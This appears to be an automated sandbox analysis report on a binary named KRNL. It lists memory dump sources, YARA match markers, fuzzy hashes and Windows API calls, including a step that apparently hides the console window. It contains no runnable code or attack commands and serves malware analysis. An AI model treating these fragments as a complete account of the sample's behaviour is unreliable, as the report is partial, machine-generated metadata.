                                                                                                                                                                                                                                                          • Instruction ID: 53c7e9f4a335b1037adbc3e9afbb4642460edb32f2ec1fe4851bf9c39eef3fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B5135316093914AD725CF29D4503ABFBE2EFE7304F28C4ADC0C99B291DB3844068796
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: Nv
• API String ID: 0-2521146493
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: Dkpk
• API String ID: 0-2230318481
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: yJA
• API String ID: 2994545307-2938920004
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: |X|X
• API String ID: 0-2218283020
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc837b4b3cb6af37b41f583372a8404740e5a4fdc6351e5068ac917573e76a8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32616C726083618BD3188F35D86137BBBD1DFD2704F68886DE4D19B391D67D8805CB46
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                                          • Instruction ID: 7a7230bd175fe8df77bf71d9a9d70d43fbaba0e463c2f5fb034005e811d22f28
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC819FB0910B009FC324EF39C946123BBF1FF56300B548A6EE8D64B795E335A495CB96
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                                          • Instruction ID: c958039b7f324a70f14877e38d7e87bb170a8ceb339f658c132a5929e586524f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9514872A183A18BD3188F25D8A137BBBD19FD2704F68886DE4D19B391D2798805CF56
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                                          • Instruction ID: 09ac1d0a9713e752f4627eff734c4282fb3d1a19a84e1ba2698046d2faa5f02a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3051F6B05147219BD724CF29C841263B7F3FFA5300754861DD4968B764E73AF492CB99
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                                          • Instruction ID: 99dc13c7fbb656e8e593b4c013347aff3b0bffb19504d9c0fb3df3c2b29b5b1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264133782583009BE7148F14DD81B7BB3A6EBC4314F28453EE285973A0DA79BC218B0A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                                          • Instruction ID: ea4754be5dd7e8cf826f622dde6b3e998fbc03a804596390a98b67661fe1b0f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64412579E10221DBDB18CF28E9016AAB3F2FF8A300F159579C845E3755DB385914CB84
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                                          • Instruction ID: 20d5841960d25e88823685a0e503dee0d7ec10e54da16e755c7071827351d428
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20312272A09210AFD710CF19C94476BB3E5EFD8708F05982DE988AB310D3769D06CBCA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F112933A081D04EC312CD3C84005E5BFE31AD7235F5D939AF4B49B2D2D6279D8A8359
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                                          • Instruction ID: 751a0443e18ccd328d4b1c2847a2144c861d21d079d442caefe011fc4f84fbda
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101B5F1B0031257E7609E11B5C0B27B2A86F84718F49453EE84897745EB7DFC05C29A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                                          • Instruction ID: 8a02cb41ffff968b99fb010e73d9931b32f54ff3ec56746a22d9f2732814edb2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7911C275008308AFC610AB15D884A7BB7AAFFDE319F05142DE78457330E332AD60DB96
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                                          • Instruction ID: 77776f84d681761c0ea4071f8d21c85d41b3b70496975be68b61ff512d909adb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C110B31A543418FD7388F658410276B7E5AF9271572DC93EC8D3A7345DB3898528F49
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                                          • Instruction ID: 04682a1340c881939bba4ac63b5721f1f095575c768f5dd830452c6098d82978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3101D636D15A604BD319CF38CC1039673E6AB86306F098538DA45E7798DB7A98508784
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                                          • Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                          • Opcode ID: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction ID: 341c42c84f5c250b81d4d878749770d96cfdb581091847031405732ae010ab71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf1dda838ae1146d79ffac75217d6f5a5e62cba7bf82d87a09097d8272ec5db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D71E272A00749FBDF219F64CC41FAF77EADF45310F294259E904A72D1EA799C008766
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 006EFE70
• __alloca_probe_16.LIBCMT ref: 006EFE9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 006EFEDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EFEF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006EFF37
• __alloca_probe_16.LIBCMT ref: 006EFF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006EFF96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006EFFB9
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
• Instruction ID: 8a514d65a2c29b63ce07548d9fda97788de5ad821e55bb1fb3a438822cf466fa
• Opcode Fuzzy Hash: 29a86a7966c2a1e3ced010acf8c1c4d083ec40a51c66d02b4590534af834ba5d
• Instruction Fuzzy Hash: 6051BE72A0138AAFEF204F66CC45FEB7BAAEF41750F248439F914DA290DB319C108B54
APIs
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction ID: 53a2b6661e2d74c74cfcfbc20e3de9288081ca08ff30eea60494de05eccb8fe2
• Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction Fuzzy Hash: 2FB15672A01259EFDB21CF24CC91BFE7FA6EF55310F144165EA44AB382DA759901C7A0
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423561
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042365E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: afrf$dfkf$s6B$tfff
• API String ID: 237503144-2388771387
• Opcode ID: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
• Instruction ID: c4fcef847fc9925244f9592ad32bc230489d7192a80fca4986f29a4843e4299b
• Opcode Fuzzy Hash: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
• Instruction Fuzzy Hash: DA51ACB1D002149FDB14CF9ADC82B9A7AB4FB84310F15816DE904AF399C7798942CBE6
APIs
• _ValidateLocalCookies.LIBCMT ref: 006F0D77
• ___except_validate_context_record.LIBVCRUNTIME ref: 006F0D7F
• _ValidateLocalCookies.LIBCMT ref: 006F0E08
• __IsNonwritableInCurrentImage.LIBCMT ref: 006F0E33
• _ValidateLocalCookies.LIBCMT ref: 006F0E88
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: b118e9bd8ffa822bdca2f7e6d26140d55c01dc1c099cfd4b7faf6a4368585889
• Instruction ID: 694c281a61097a4ca51bfcc6b9b39304c963aa9d2f759b1aa154b3f46cf189b9
• Opcode Fuzzy Hash: b118e9bd8ffa822bdca2f7e6d26140d55c01dc1c099cfd4b7faf6a4368585889
• Instruction Fuzzy Hash: 9341C074A0021C9BDF10DF68C884AFEBBA7AF44314F148959EA149B393DB35AE11CB94
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3CA5
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3CBF
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E3CE0
• __Getctype.LIBCPMT ref: 006E3D92
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E3DD8
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
• String ID: e.q
• API String ID: 3087743877-2639829087
• Opcode ID: 46f7a660d1d7ba914c4511f4953c0d7591864ab454aec560f9ee095b921ec09a
• Instruction ID: 1f729a07bbbb5adc5d9fdeb5a5269754e35ec728f4d795bcd7b305397da966ec
• Opcode Fuzzy Hash: 46f7a660d1d7ba914c4511f4953c0d7591864ab454aec560f9ee095b921ec09a
• Instruction Fuzzy Hash: B0413971D013648FCB10DF99D845BAEB7B2FF44B20F188219D8156B391DB79AA01CF95
APIs
                                                                                                                                                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 006E24DD
                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 006E24E6
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E2524
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
